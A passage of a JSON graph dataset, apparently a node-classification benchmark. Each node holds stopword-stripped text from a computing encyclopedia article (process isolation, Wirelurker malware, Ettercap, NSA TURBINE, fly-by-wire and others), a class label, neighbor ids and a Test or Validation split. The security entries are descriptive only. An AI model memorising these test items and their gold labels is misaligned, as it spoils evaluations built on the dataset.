    ],
    "mask": "Test"
  },
  {
    "node_id": 4075,
    "label": 2,
    "text": "Process_isolation:process isolation process isolation set different hardware software technologies designed protect process processes operating system preventing process writing process b process isolation implemented virtual address space process address space different process b address space – preventing writing onto b security easier enforce disallowing inter-process memory access contrast less secure architectures dos process write memory process system process isolation limited controlled interaction processes may still allowed inter-process communication ipc channels shared memory local sockets internet sockets scheme process memory isolated processes except process allowing input collaborating processes system policies may disallow ipc circumstances example mandatory access control systems subjects different sensitivity levels may allowed communicate notable operating systems support process isolation internet explorer 4 used process isolation order allow separate windowed instances browser processes however height browser wars dropped subsequent versions compete netscape navigator sought concentrate upon one process entire internet suite idea process-per-instance would revisited decade afterwards tabbed browsing became commonplace google chrome multi-process architecture internet explorer 8 loosely coupled ie lcie tabs containing webpages contained within semi-separate os-level processes isolated core process browser prevent crash one tab/page crashing entire browser method known popularly multiprocess process-per-tab meant manage memory processing allowing offending tabs crash separately browser tabs manage security",
    "neighbors": [
      7713,
      6087,
      4972,
      6797,
      7983,
      9887,
      7762,
      11539,
      5492,
      5078,
      823,
      639
    ],
    "mask": "Test"
  },
  {
    "node_id": 4076,
    "label": 2,
    "text": "DEMOS:demos demos dialogovaya edinaya mobilnaya operatsionnaya sistema unix-like operating system developed soviet union derived bsd development initiated kurchatov institute atomic energy moscow 1982 development continued cooperation institutes commercialized demos co-operative employed key contributors demos earlier alternative mnos clone unix version 6 mnos demos version 1.x gradually merged 1986 1990 leaving joint os demos version 2.x support different cyrillic charsets koi-8 u-code used demos 1 mnos respectively initially developed sm-4 pdp-11/40 clone sm-1600 later ported elektronika-1082 besm es evm clones vax-11 sm-1700 number platforms including pc/xt elektronika-85 clone dec professional number motorola 68020-based microcomputers development demos effectively ceased 1991 second project demos team relcom took priority originally suggested name унас unas volapukish word play unix у них u nih russian means also у нас u nas means also serious management dismissed idea favor traditional alphabet soup",
    "neighbors": [
      6787,
      8713,
      11145,
      6412,
      7823,
      5267,
      5397,
      1304,
      3487,
      3488,
      3241,
      10156,
      7983,
      3248,
      2995,
      9141,
      823,
      7224,
      3129,
      9784,
      1853,
      9151,
      10436,
      4039,
      6369,
      9452,
      5492,
      7286,
      2424,
      633
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4077,
    "label": 3,
    "text": "Masters_of_the_Universe:_The_Movie:masters universe movie masters universe movie action-adventure game developed gremlin graphics published 1987 based american film masters universe 1987 directed gary goddard film game part masters universe media franchise promotional photo dolph lundgren he-man frank langella skeletor illustrates video game packaging msx version game titled masters universe two masters universe video games published year",
    "neighbors": [
      10931,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 4078,
    "label": 3,
    "text": "Slot_(computer_architecture):slot computer architecture slot comprises operation issue data paths machinery surrounding collection one functional units fus share resources term slot common purpose vliw world relationship operation instruction pipeline execute explicit dynamically scheduled machines concept commonly called execute pipeline modern conventional cpus several compute pipelines say two alu one fpu one sse/mmx one branch issue one instruction per basic cycle several flight correspond slots pipelines may several fus adder multiplier say one fu pipeline issued particular cycle fu population pipeline/slot design option cpu",
    "neighbors": [
      6818,
      1958,
      8523,
      10796,
      6639,
      1776,
      4465,
      1461,
      8125,
      8126
    ],
    "mask": "Test"
  },
  {
    "node_id": 4079,
    "label": 3,
    "text": "ASCI_Blue_Mountain:asci blue mountain asci blue mountain supercomputer installed los alamos national laboratory los alamos new mexico designed run simulations united states national nuclear security administration advanced simulation computing program computer collaboration silicon graphics corporation los alamos national laboratory installed 1998 cluster ccnuma sgi origin 2000 systems contains 6,144 mips r10000 microprocessors theoretical top performance 3.072 teraflops built stage accelerated strategic computing initiative asci started u.s. department energy national nuclear security administration build simulator replace live nuclear weapons testing following moratorium testing started president george h. w. bush 1992 extended bill clinton 1993 unveiled commissioned 1998 june 1999 world second fastest computer remained among world ten fastest computers november 2001 according los alamos national laboratory website supercomputer set world record may 2000 equivalent 17.8 years normal computer processing within 72 hours including 15,000 engineering simulations requiring 10 hours first commissioned november 1998 blue mountain decommissioned monday november 8 2004 8 replaced asci q lightning qsc supercomputers",
    "neighbors": [
      1480,
      7234,
      10051,
      6247
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4080,
    "label": 4,
    "text": "Wirelurker:wirelurker wirelurker family malware targeting macos ios systems malware designed target users china use apple mobile desktop devices malware suspected infecting thousands chinese mobile devices security firm palo alto networks credited uncovering malware wirelurker monitors ios device connected via usb infected macos computer installs downloaded third-party applications automatically generated malicious applications onto device wirelurker infect device regardless whether jailbroken wirelurker complex form malware utilizes techniques file hiding code obfuscation encryption wirelurker capable stealing variety information mobile devices infects regularly requests updates attackers command control server three individuals china arrested suspicion creating distributing wirelurker malware suspects identified surnames wang lee chen taken custody thursday november 13 2014 chinese authorities believe suspects created malware financial gains several steps taken order protect wirelurker malware",
    "neighbors": [
      11577,
      7515
    ],
    "mask": "Test"
  },
  {
    "node_id": 4081,
    "label": 4,
    "text": "United_States_Computer_Emergency_Readiness_Team:united states computer emergency readiness team united states computer emergency readiness team us-cert organization within department homeland security ’ dhs national protection programs directorate nppd specifically us-cert branch office cybersecurity communications cs c national cybersecurity communications integration center nccic us-cert responsible analyzing reducing cyber threats vulnerabilities disseminating cyber threat warning information coordinating incident response activities division brings advanced network digital media analysis expertise bear malicious activity targeting networks within united states abroad dhs cyber security division created us-cert september 2003 protect internet infrastructure united states coordinating defense responding cyber-attacks 24-hour operational arm nccic accepts triages collaboratively responds incidents provides technical assistance information system operators disseminates timely notifications regarding current potential security threats exploits vulnerabilities public via national cyber awareness system ncas us-cert operates side-by-side industrial control systems computer emergency response team ics-cert deals security related industrial control systems entities operate together within nccic provide single source support critical infrastructure stakeholders five operational aspects enable us-cert meet objectives improving nation ’ cybersecurity posture coordinate cyber information sharing proactively manage cyber risks protecting constitutional rights americans feature involved reviewing researching vetting documenting computer network defense cnd attributes available us-cert classified unclassified helps promote improved mitigation resources federal departments agencies across einstein network requesting deployment countermeasures response credible cyber threats feature conducts technical analysis data provided partners constituents monitoring systems understand nature attacks threats vulnerabilities well develop tips indicators warnings actionable information us-cert ’ cnd mission feature conducts digital forensic examinations malware artifact analysis reverse engineering determine attack vectors mitigation techniques identifies possible threats based analysis malicious code digital media provides indicators mitigate prevent future intrusions feature informs cnd community potential threats allows hardening cyber defenses well develops near real-time/rapid response community products e.g. reports white papers critical event occurs detected operations create tailored product describing event recommended course action mitigation techniques applicable ensure constituents made aware protect organization appropriately feature supports nccic information sharing development web presence responsible establishing maintaining assured communications developing disseminating information products supporting development maintenance collaboration tools feature partners foreign governments entities enhance global cybersecurity defense posture supports bilateral engagements cert-to-cert information sharing/trust building activities improvements related global collaboration agreements data sharing standards january 2015 report senator tom coburn ranking member committee homeland security governmental affairs expressed concern us-cert always provide information nearly quickly alternative private sector threat analysis companies",
    "neighbors": [
      3843,
      5636,
      7556,
      8,
      4489,
      5002,
      11152,
      3473,
      6550,
      6423,
      5665,
      1319,
      7337,
      7467,
      9771,
      3503,
      10928,
      2865,
      7474,
      11188,
      4023,
      3643,
      1608,
      6091,
      10190,
      10448,
      4435,
      5589,
      8281,
      7515,
      8667,
      9569,
      10338,
      612,
      6884,
      3944,
      2409,
      106,
      5226,
      4725,
      4471,
      763,
      2300,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4082,
    "label": 3,
    "text": "1942_(video_game):1942 video game 1942 vertically scrolling shooter made capcom released arcade 1984 first game 19xx series followed 1942 set pacific theater world war ii despite game created japanese developers goal reach tokyo destroy entire japanese air fleet player pilots lockheed p-38 lightning dubbed super ace player shoot enemy planes avoid enemy fire player perform roll vertical loop game player may collect series power-ups one allowing plane escorted two smaller fighters tip tow formation enemies kawasaki ki-61s mitsubishi a6m zeros kawasaki ki-48s boss plane nakajima g8n game ported famicom 1985 japan north america 1986 developed micronics msx nec pc-8801 game boy color ported european games publisher elite systems amstrad cpc zx spectrum commodore 64 music commodore 64 version based main verse ron goodwin 633 squadron movie score arrangement mark cooksey 1942 capcom breakaway hit eclipsing popularity company preceding three titles vulgus sonson pirate ship higemaru 1987 number-one euromax uk arcade chart followed wonder boy number-two 1942 first capcom title spawn successful series sequels five titles 19xx line released 1987 2000 many capcom vertical shooters featured similar gameplay re-released playstation saturn consoles featured capcom classics collection playstation 2 xbox well playstation portable arcade version added wii virtual console japan december 21 2010 pal north american regions january 2011 also re-released windows mobile professional. released xbox live arcade playstation network 2008 1942 first strike released ios 2010 game series sold total 1.4 million units worldwide december 31 2018 stands capcom 18th best-selling franchise",
    "neighbors": [
      11238,
      3788,
      10316,
      9006,
      1776,
      8496,
      4690,
      6835,
      10931
    ],
    "mask": "Test"
  },
  {
    "node_id": 4083,
    "label": 4,
    "text": "European_Cybercrime_Centre:european cybercrime centre european cybercrime centre ec3 ec³ body police office europol european union eu headquartered hague coordinates cross-border law enforcement activities computer crime acts centre technical expertise matter officially launched 11 january 2013 european cybercrime centre expected fully operational 2015 began staff 30 plans expand 40 end 2013 began operations budget 3.6 million euros head ec3 reports directly head europol first person head department former head danish domestic intelligence left interpol january 2015 become barclays chief intelligence security officer.. ec3 tasked assisting member states efforts dismantle disrupt cybercrime networks developing tools providing training ec3 works european union intelligence situation centre intcen united nations office drugs crime undcp world customs organization wco european border coast guard agency ebcg also known frontex european anti-fraud office olaf press releases 2015 also revealed ec3 works american security services federal bureau investigation fbi overlap responsibilities european union agency network information security enisa press conference 10 february 2014 asked massive identity theft uncovered german federal office information security head ec3 troels oerting said unit responsible combatting politically motivated hacking and/or espionage eu institutions february 2014 troels oerting reported successes unit 2013 included catching internet extortioners 13 arrests also involved fighting malware attacks banks using botnets – cooperation microsoft experts german federal criminal police office – taking zeroaccess botnet 2014 details revealed operation onymous took number darknet sites including pandora cloud 9 hydra blue sky topix flugsvamp cannabis road black market silk road 2.0 2015 american media reported coordinated fbi operation assistance ec3 take dark0de largest english -language communication trading platform cybercriminals well eu member states cooperation number states including australia canada republic macedonia norway switzerland monaco bosnia herzegovina colombia moldova russia turkey republic serbia montenegro ukraine united states",
    "neighbors": [
      7522,
      10600,
      10875,
      4883,
      7515,
      5085
    ],
    "mask": "Test"
  },
  {
    "node_id": 4084,
    "label": 5,
    "text": "Traversal_Using_Relays_around_NAT:traversal using relays around nat traversal using relays around nat turn protocol assists traversal network address translators nat firewalls multimedia applications may used transmission control protocol tcp user datagram protocol udp useful clients networks masqueraded symmetric nat devices turn aid running servers well known ports private network nat supports connection user behind nat single peer telephony example turn specified rfc 5766 update turn ipv6 specified rfc 6156 turn uri scheme documented rfc 7065 nats providing many benefits also come many drawbacks troublesome drawbacks fact break many existing ip applications make difficult deploy new ones guidelines developed describe build nat friendly protocols many protocols simply constructed according guidelines examples protocols include multimedia applications file sharing session traversal utilities nat stun provides one way application traverse nat stun allows client obtain transport address ip address port may useful receiving packets peer however addresses obtained stun may usable peers addresses work depending topological conditions network therefore stun provide complete solution nat traversal complete solution requires means client obtain transport address receive media peer send packets public internet accomplished relaying data server resides public internet traversal using relay nat turn protocol allows client obtain ip addresses ports relay although turn almost always provides connectivity client resource intensive provider turn server therefore desirable use turn last resort preferring mechanisms stun direct connectivity possible accomplish interactive connectivity establishment ice methodology used discover optimal means connectivity process begins client computer wants contact peer computer data transaction due client peer behind respective nats stun option one nats symmetric nat type nat known non-stun compatible turn must used first client contacts turn server allocate request allocate request asks turn server allocate resources client may contact peer allocation possible server allocates address client use relay sends client allocation successful response contains allocated relayed transport address located turn server second client sends createpermissions request turn server create permissions check system peer-server communications words peer finally contacted sends information back turn server relayed client turn server uses permissions verify peer-to-turn server communication valid permissions created client two choices sending actual data 1 use send mechanism 2 reserve channel using channelbind request send mechanism straightforward contains larger header 36 bytes substantially increase bandwidth turn relayed conversation contrast channelbind method lighter header 4 bytes requires channel reserved needs periodically refreshed among considerations using either method send channel binding turn server receives data client relays peer using udp datagrams contain source address allocated relayed transport address peer receives data responds using udp datagram transport protocol sending udp datagram relay address turn server turn server receives peer udp datagram checks permissions valid forwards client process gets around even symmetric nats client peer least talk turn server allocated relay ip address communication turn robust stun assist traversal types nats turn communication relays entire communication server requiring far server bandwidth stun protocol typically resolves public facing ip address relays information client peer use direct communication reason ice protocol mandates stun usage first resort turn usage dealing symmetric nats situations stun used",
    "neighbors": [
      4068,
      2985,
      10924,
      2093,
      7214,
      3792,
      6993,
      5972,
      11413,
      5470
    ],
    "mask": "None"
  },
  {
    "node_id": 4085,
    "label": 4,
    "text": "Ettercap_(software):ettercap software ettercap free open source network security tool man-in-the-middle attacks lan used computer network protocol analysis security auditing runs various unix-like operating systems including linux mac os x bsd solaris microsoft windows capable intercepting traffic network segment capturing passwords conducting active eavesdropping number common protocols original developers later founded hacking team ettercap works putting network interface promiscuous mode arp poisoning target machines thereby act 'man middle unleash various attacks victims ettercap plugin support features extended adding new plugins ettercap supports active passive dissection many protocols including ciphered ones provides many features network host analysis ettercap offers four modes operation addition software also offers following features ettercap also ability actively passively find poisoners lan",
    "neighbors": [
      5251,
      3460,
      4490,
      6797,
      3218,
      5397,
      11413,
      6295,
      5405,
      5024,
      10788,
      2085,
      1064,
      3752,
      9640,
      939,
      10924,
      6013,
      7983,
      6834,
      823,
      8504,
      9146,
      4797,
      3133,
      5437,
      8637,
      7364,
      2887,
      4307,
      9440,
      10341,
      5990,
      5612,
      7022,
      7411,
      4725,
      6651,
      2045,
      2558,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 4086,
    "label": 4,
    "text": "TURBINE_(US_government_project):turbine us government project turbine codename automated system essence enables automated management control large network implants form remotely transmitted malware selected individual computer devices bulk tens thousands devices nsa built infrastructure enables covertly hack computers mass scale using automated systems reduce level human oversight process quoted intercept turbine designed allow current implant network scale large size millions implants creating system automated control implants groups instead individually nsa shared many files use implants counterparts so-called five eyes surveillance alliance – united kingdom canada new zealand australia among things due turbine control implants nsa capable turbine implants linked relies upon large network clandestine surveillance sensors nsa installed locations across world including agency headquarters maryland fort george g. meade eavesdropping bases used agency misawa japan misawa air base menwith hill england raf menwith hill codenamed turmoil sensors operate sort high-tech surveillance dragnet monitoring packets data sent across internet turbine implants exfiltrate data infected computer systems turmoil sensors automatically identify data return nsa analysis targets communicating turmoil system used send alerts tips turbine enabling initiation malware attack identify surveillance targets nsa uses series data selectors flow across internet cables selectors include email addresses ip addresses unique cookies containing username identifying information sent user computer websites google facebook hotmail yahoo twitter unique google advertising cookies track browsing habits unique encryption key fingerprints traced specific user computer ids sent across internet windows computer crashes updates",
    "neighbors": [
      11078,
      3495,
      6344,
      6797,
      7893,
      7965
    ],
    "mask": "Test"
  },
  {
    "node_id": 4087,
    "label": 4,
    "text": "Arxan_Technologies:arxan technologies arxan technologies american technology company specializing application attack prevention self-protection solution iot mobile applications company reports applications secured running 500 million devices arxan solutions used protect applications across range industries including mobile payments banking automotive iot healthcare iot gaming high-tech arxan security products used protect confidentiality applications breached reverse-engineering code analysis means integrity applications compromised code modification malware insertion types attacks arxan privately held private equity-backed fall 2013 ta associates private equity firm completed majority investment arxan technologies previously company received series b funding 2003 followed 13 million series c funding 2007 series funding 4 million 2009 early investors included trident capital edf ventures legend ventures paladin capital dunrath capital tdf fund solstice capital arxan founded 2001 eric davis purdue university researchers mikhail atallah tim korb john rice hoi chang first funding came richard early dunrath capital rich early subsequently became arxan first ceo company early intellectual property licensed purdue university company initial focus defense anti-tamper applications following sale defense technology unit arxan defense systems microsemi 2010 arxan focused commercial applications arxan offers number anti-tamper software products application cryptographic key protection include may 2012 company announced comprehensive support android application protection hardening tampering piracy june 2014 arxan announced mobile application protection offerings sold ibm part ibm portfolio security products arxan products based patented security techniques code hardening tamper-proofing key security node locking core technology consists multi-layered interconnected network guards perform specific security function embedded application binaries make programs tamper-aware tamper-resistant self-healing company claims three-layer protection paradigm defend detect react differentiating approach detecting attack attempted responding detected attacks alerts repairs protection helps secure software hacking attacks threats",
    "neighbors": [
      10918,
      8171,
      3629,
      4049,
      7515,
      5404,
      10173
    ],
    "mask": "Test"
  },
  {
    "node_id": 4088,
    "label": 7,
    "text": "ActiveVOS:activevos activevos business process management suite business processes designed using graphical bpmn 2.0 notation process engine implements ws-bpel 2.0 standard well bpel4people processes require people perform tasks task list",
    "neighbors": [
      2501,
      5612,
      6862,
      7983,
      1041
    ],
    "mask": "None"
  },
  {
    "node_id": 4089,
    "label": 6,
    "text": "XZ_Utils:xz utils xz utils previously lzma utils set free command-line lossless data compressors including lzma xz unix-like operating systems version 5.0 onwards microsoft windows xz utils consists two major components various command shortcuts exist lzma xz -- format=lzma unxz xz -- decompress analogous gunzip xzcat unxz -- stdout analogous zcat xz utils compress decompress xz lzma file formats since lzma format legacy xz utils compresses default xz behavior software well properties file format designed work similarly popular unix compressing tools gzip bzip2 consists unix port igor pavlov lzma-sdk adapted fit seamlessly unix environments usual structure behavior like gzip bzip xz lzma compress single files data streams input bundle multiple files single archive – archiving program used first tar compressing archive decompressing archive version 1.22 greater gnu implementation tar transparent support tarballs compressed lzma xz using switches codice_1 codice_2 xz compression codice_3 lzma compression creating archive compressing decompressing archive extracting contents development xz utils took place within tukaani project led mike kezner small group developers maintained linux distribution based slackware source code xz utils released public domain rest subject different free software licenses specifically core parts public domain software parts bulk system gnu lgpl v2.1 parts build system gnu gpl v2 gnu gpl v3 resulting software binary therefore gpl binaries available freebsd linux systems microsoft windows freedos number linux distributions including fedora slackware ubuntu debian arch linux use xz compressing software packages gnu ftp archive also uses xz",
    "neighbors": [
      6022,
      10121,
      1420,
      6797,
      1940,
      5397,
      3222,
      9880,
      292,
      10149,
      3114,
      10027,
      7983,
      950,
      823,
      6713,
      2755,
      11076,
      1352,
      4296,
      10317,
      10575,
      4561,
      722,
      11614,
      1631,
      3296,
      9953,
      5858,
      6759,
      7529,
      4459,
      5612,
      237,
      1646,
      10732,
      7667,
      2804,
      6389,
      2045,
      894,
      10623
    ],
    "mask": "Test"
  },
  {
    "node_id": 4090,
    "label": 4,
    "text": "Fly-by-wire:fly-by-wire fly-by-wire fbw system replaces conventional manual flight controls aircraft electronic interface movements flight controls converted electronic signals transmitted wires hence fly-by-wire term flight control computers determine move actuators control surface provide ordered response use mechanical flight control backup systems boeing 777 use fully fly-by-wire controls improved fully fly-by-wire systems interpret pilot control inputs desired outcome calculate control surface positions required achieve outcome results various combinations rudder elevator aileron flaps engine controls different situations using closed feedback loop pilot may fully aware control outputs acting effect outcome aircraft reacting expected fly-by-wire computers act stabilise aircraft adjust flying characteristics without pilot involvement prevent pilot operating outside aircraft safe performance envelope mechanical hydro-mechanical flight control systems relatively heavy require careful routing flight control cables aircraft systems pulleys cranks tension cables hydraulic pipes systems often require redundant backup deal failures increases weight limited ability compensate changing aerodynamic conditions dangerous characteristics stalling spinning pilot-induced oscillation pio depend mainly stability structure aircraft concerned rather control system depending pilot action term fly-by-wire implies purely electrically signaled control system used general sense computer-configured controls computer system interposed operator final control actuators surfaces modifies manual inputs pilot accordance control parameters side-sticks centre sticks conventional flight control yokes used fly fbw aircraft fbw aircraft lighter similar design conventional controls partly due lower overall weight system components partly natural stability aircraft relaxed slightly transport aircraft maneuverable fighter means stability surfaces part aircraft structure therefore made smaller include vertical horizontal stabilizers fin tailplane normally rear fuselage structures reduced size airframe weight reduced advantages fbw controls first exploited military commercial airline market airbus series airliners used full-authority fbw controls beginning a320 series see a320 flight control though limited fbw functions existed a310 boeing followed 777 later designs pilot commands flight control computer make aircraft perform certain action pitch aircraft roll one side moving control column sidestick flight control computer calculates control surface movements cause plane perform action issues commands electronic controllers surface controllers surface receive commands move actuators attached control surface moved flight control computer commanded controllers measure position flight control surface sensors lvdts fly-by-wire control systems allow aircraft computers perform tasks without pilot input automatic stability systems operate way gyroscopes fitted sensors mounted aircraft sense rotation pitch roll yaw axes movement straight level flight example results signals computer automatically move control actuators stabilize aircraft traditional mechanical hydraulic control systems usually fail gradually loss flight control computers immediately renders aircraft uncontrollable reason fly-by-wire systems incorporate either redundant computers triplex quadruplex etc kind mechanical hydraulic backup combination mixed control system mechanical backup feedbacks rudder elevation directly pilot therefore makes closed loop feedback systems senseless aircraft systems may quadruplexed four independent channels prevent loss signals case failure one even two channels high performance aircraft fly-by-wire controls also called ccvs control-configured vehicles may deliberately designed low even negative stability flight regimes rapid-reacting ccv controls electronically stabilize lack natural stability pre-flight safety checks fly-by-wire system often performed using built-in test equipment bite number control movement steps automatically performed reducing workload pilot groundcrew speeding flight-checks aircraft panavia tornado example retain basic hydro-mechanical backup system limited flight control capability losing electrical power case tornado allows rudimentary control stabilators pitch roll axis movements servo-electrically operated control surfaces first tested 1930s soviet tupolev ant-20 long runs mechanical hydraulic connections replaced wires electric servos first pure electronic fly-by-wire aircraft mechanical hydraulic backup apollo lunar landing training vehicle lltv first flown 1968 first non-experimental aircraft designed flown 1958 fly-by-wire flight control system avro canada cf-105 arrow feat repeated production aircraft concorde 1969 system also included solid-state components system redundancy designed integrated computerised navigation automatic search track radar flyable ground control data uplink downlink provided artificial feel feedback pilot uk two seater avro 707b flown fairey system mechanical backup early mid-60s program curtailed air-frame ran flight time 1972 first digital fly-by-wire fixed-wing aircraft without mechanical backup take air f-8 crusader modified electronically nasa united states test aircraft f-8 used apollo 11 guidance navigation control hardware preceded 1964 llrv pioneered fly-by-wire flight mechanical backup control digital computer three analog redundant channels ussr sukhoi t-4 also flew time united kingdom trainer variant british hawker hunter fighter modified british royal aircraft establishment fly-by-wire flight controls right-seat pilot fly-by-wire flight control systems eliminate complexity fragility weight mechanical circuit hydromechanical electromechanical flight control systems—each replaced electronic circuits control mechanisms cockpit operate signal transducers turn generate appropriate electronic commands next processed electronic controller—either analog one modernly digital one aircraft spacecraft autopilots part electronic controller hydraulic circuits similar except mechanical servo valves replaced electrically controlled servo valves operated electronic controller simplest earliest configuration analog fly-by-wire flight control system configuration flight control systems must simulate feel electronic controller controls electrical feel devices provide appropriate feel forces manual controls used concorde first production fly-by-wire airliner sophisticated versions analog computers replaced electronic controller canceled 1950s canadian supersonic interceptor avro canada cf-105 arrow employed type system analog computers also allowed customization flight control characteristics including relaxed stability exploited early versions f-16 giving impressive maneuverability digital fly-by-wire flight control system extended analog counterpart digital signal processing receive interpret input multiple sensors simultaneously altimeters pitot tubes adjust controls real time computers sense position force inputs pilot controls aircraft sensors solve differential equations related aircraft equations motion determine appropriate command signals flight controls execute intentions pilot programming digital computers enable flight envelope protection protections tailored aircraft handling characteristics stay within aerodynamic structural limitations aircraft example computer flight envelope protection mode try prevent aircraft handled dangerously preventing pilots exceeding preset limits aircraft flight-control envelope prevent stalls spins limit airspeeds g forces airplane software also included stabilize flight-control inputs avoid pilot-induced oscillations since flight-control computers continuously feedback environment pilot workloads reduced also military naval applications possible fly military aircraft relaxed stability primary benefit aircraft maneuverability combat training flights so-called carefree handling stalling spinning undesirable performances prevented automatically computers digital flight control systems enable inherently unstable combat aircraft lockheed f-117 nighthawk northrop grumman b-2 spirit flying wing fly usable safe manners federal aviation administration faa united states adopted rtca/do-178c titled software considerations airborne systems equipment certification certification standard aviation software safety-critical component digital fly-by-wire system including applications laws aeronautics computer operating systems need certified do-178c level b depending class aircraft applicable preventing potential catastrophic failures nevertheless top concern computerized digital fly-by-wire systems reliability even analog electronic control systems digital computers running software often control path pilot aircraft flight control surfaces computer software crashes reason pilot may unable control aircraft hence virtually fly-by-wire flight control systems either triply quadruply redundant computers electronics three four flight-control computers operating parallel three four separate data buses connecting control surface multiple redundant flight control computers continuously monitor output one computer begins give aberrant results reason potentially including software hardware failures flawed input data combined system designed exclude results computer deciding appropriate actions flight controls depending specific system details may potential reboot aberrant flight control computer reincorporate inputs return agreement complex logic exists deal multiple failures may prompt system revert simpler back-up modes addition early digital fly-by-wire aircraft also analog electrical mechanical hydraulic back-up flight control system space shuttle addition redundant set four digital computers running primary flight-control software fifth back-up computer running separately developed reduced-function software flight-control system – one commanded take event fault ever affects computers four back-up system serves reduce risk total flight-control-system failure ever happening general-purpose flight software fault escaped notice four computers airliners flight-control redundancy improves safety fly-by-wire control systems physically lighter lower maintenance demands conventional controls also improve economy terms cost ownership in-flight economy certain designs limited relaxed stability pitch axis example boeing 777 flight control system may allow aircraft fly aerodynamically efficient angle attack conventionally stable design modern airliners also commonly feature computerized full-authority digital engine control systems fadecs control jet engines air inlets fuel storage distribution system similar fashion way fbw controls flight control surfaces allows engine output continually varied efficient usage possible second generation embraer e-jet family gained 1.5 efficiency improvement first generation fly-by-wire system enabled reduction 280 ft.² 250 ft.² horizontal stabilizer e190/195 variants airbus boeing differ approaches implementing fly-by-wire systems commercial aircraft since airbus a320 airbus flight-envelope control systems always retain ultimate flight control flying normal law permit pilots violate aircraft performance limits unless choose fly alternate law strategy continued subsequent airbus airliners however event multiple failures redundant computers a320 mechanical back-up system pitch trim rudder airbus a340 purely electrical electronic back-up rudder control system beginning a380 flight-control systems back-up systems purely electrical use three-axis backup control module bcm boeing airliners boeing 777 allow pilots completely override computerised flight-control system permitting aircraft flown outside usual flight-control envelope decide necessary advent fadec full authority digital engine control engines permits operation flight control systems autothrottles engines fully integrated modern military aircraft systems autostabilization navigation radar weapons system integrated flight control systems fadec allows maximum performance extracted aircraft without fear engine misoperation aircraft damage high pilot workloads civil field integration increases flight safety economy airbus a320 fly-by-wire brethren protected dangerous situations low-speed stall overstressing flight envelope protection result conditions flight control systems commands engines increase thrust without pilot intervention economy cruise modes flight control systems adjust throttles fuel tank selections precisely skillful pilots fadec reduces rudder drag needed compensate sideways flight unbalanced engine thrust a330/a340 family fuel transferred main wing center fuselage tanks fuel tank horizontal stabilizer optimize aircraft center gravity cruise flight fuel management controls keep aircraft center gravity accurately trimmed fuel weight rather drag-inducing aerodynamic trims elevators fly-by-optics sometimes used instead fly-by-wire offers higher data transfer rate immunity electromagnetic interference lighter weight cases cables changed electrical optical fiber cables sometimes referred fly-by-light due use fiber optics data generated software interpreted controller remain fly-by-light effect decreasing electro-magnetic disturbances sensors comparison common fly-by-wire control systems kawasaki p-1 first production aircraft world equipped flight control system eliminated mechanical transmission circuits fly-by-wire flight control systems next step eliminate bulky heavy hydraulic circuits hydraulic circuit replaced electrical power circuit power circuits power electrical self-contained electrohydraulic actuators controlled digital flight control computers benefits digital fly-by-wire retained biggest benefits weight savings possibility redundant power circuits tighter integration aircraft flight control systems avionics systems absence hydraulics greatly reduces maintenance costs system used lockheed martin f-35 lightning ii airbus a380 backup flight controls boeing 787 airbus a350 also incorporate electrically powered backup flight controls remain operational even event total loss hydraulic power wiring adds considerable amount weight aircraft therefore researchers exploring implementing fly-by-wireless solutions fly-by-wireless systems similar fly-by-wire systems however instead using wired protocol physical layer wireless protocol employed addition reducing weight implementing wireless solution potential reduce costs throughout aircraft life cycle example many key failure points associated wire connectors eliminated thus hours spent troubleshooting wires connectors reduced furthermore engineering costs could potentially decrease less time would spent designing wiring installations late changes aircraft design would easier manage etc newer flight control system called intelligent flight control system ifcs extension modern digital fly-by-wire flight control systems aim intelligently compensate aircraft damage failure flight automatically using engine thrust avionics compensate severe failures loss hydraulics loss rudder loss ailerons loss engine etc several demonstrations made flight simulator cessna-trained small-aircraft pilot successfully landed heavily damaged full-size concept jet without prior experience large-body jet aircraft development spearheaded nasa dryden flight research center reported enhancements mostly software upgrades existing fully computerized digital fly-by-wire flight control systems dassault falcon 7x embraer legacy 500 business jets flight computers partially compensate engine-out scenarios adjusting thrust levels control inputs still require pilots respond appropriately",
    "neighbors": [
      477,
      7983
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4091,
    "label": 7,
    "text": "Virtual_organization_(grid_computing):virtual organization grid computing grid computing virtual organization vo refers dynamic set individuals institutions defined around set resource-sharing rules conditions virtual organizations share commonality among including common concerns requirements may vary size scope duration sociology structure collaborations involved grid computing early 2000s lead emergence multiple organizations function one unit use shared competencies resources purpose one identified goals virtual organization characteristics formal organization one comprises complex network smaller organizations contribute part production process boundaries organizations fuzzy control generally market forces reinforced certainty long- term contracts xtreemos project promised support virtual organizations",
    "neighbors": [
      4194,
      5956,
      2901,
      247,
      7935
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4092,
    "label": 0,
    "text": "Language_Technologies_Institute:language technologies institute language technologies institute lti research institute carnegie mellon university pittsburgh pennsylvania united states focuses area language technologies main scholarly research institute machine translation speech recognition speech synthesis information retrieval parsing information extraction 1996 institute existed center machine translation established 1986 subsequently 1996 onwards started awarding degrees name changed language technologies institute current director institute professor jaime carbonell",
    "neighbors": [
      3335,
      7337,
      7561,
      3533,
      5399,
      10680,
      4441,
      7164,
      10557,
      5855
    ],
    "mask": "Test"
  },
  {
    "node_id": 4093,
    "label": 3,
    "text": "Predator_(video_game):predator video game predator 1987 side-scrolling action game based film title player starts weapons must collect game progresses predator received mixed largely positive reviews across platforms including accolades cu screen star commodore user commodore 64 version c+vg hit computer video games zx spectrum version rachael smith sinclair gave latter version game score 7/10 opining great graphics tough get grips sudden death sneaks every opportunity germany predator put index bundesprüfstelle für jugendgefährdende medien bpjm made illegal sell make game available minors germany well making illegal advertise game form",
    "neighbors": [
      10931,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 4094,
    "label": 3,
    "text": "The_Last_Mission_(video_game):last mission video game last mission computer game released 1987 spanish company opera soft sinclair spectrum amstrad cpc msx also ported ibm pc platform 2d flip-screen side-view game following robot rebellion humans fled earth planet nova sent robot or-cabe-3 back earth obtain secret defense plans enemy robot base player takes control or-cabe-3 attempts escape enemy base plans board spacecraft nova player role robot or-cabe-3 attempts escape enemy base leave earth starting deepest level base robot stolen defense plans must evade hostile robots travel surface escape ship awaits robot or-cabe-3 resembles tank rotating gun mounted caterpillar-track base gun section capable flight may detached base kill enemies solve problems though loses energy state runs energy game ends life lost gun section destroyed base section destroyed respawned starting location lives lost",
    "neighbors": [
      9166,
      9006
    ],
